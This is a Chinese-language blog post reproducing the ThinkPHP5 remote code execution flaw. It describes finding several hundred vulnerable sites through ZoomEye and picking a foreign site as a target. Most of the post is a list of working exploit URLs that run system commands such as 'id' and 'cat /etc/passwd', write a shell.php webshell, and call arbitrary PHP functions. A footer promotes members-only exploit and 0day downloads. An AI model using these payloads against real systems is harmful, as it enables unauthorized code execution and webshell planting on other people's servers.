thinkphp5远程代码执行复现
0x01前言
12 月 10 日,ThinkPHP 官方发布了安全更新,其中修复了 ThinkPHP5 框架的一个高危漏洞:
https://blog.thinkphp.cn/869075
0x02 漏洞复现:
zoomeye搜索关键字“你值得信赖的PHP框架” ,搜到424个thinkphp5的站:
找个国外地址作为目标:
exp:
?s=index/\think\Request/input&filter=phpinfo&data=1
?s=index/\think\Request/input&filter=system&data=id
?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=
?s=index/\think\view\driver\Php/display&content=
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
exp代码:shell
index.php?s=index/\think\Request/input&filter=system&data=cat /etc/passwd
升级
常见问题FAQ
- 下载须知:
- 所有工具以及资源来自网络收集,所有下载,仅供学习交流。禁止利用从本站点下载的工具进行非法活动,从事危害国家网络安全等行为,请遵守相关法律规定,如有违反与本站无关。
- 会员的作用是什么?
- 本站会上线exp漏洞库与最新0day供会员下载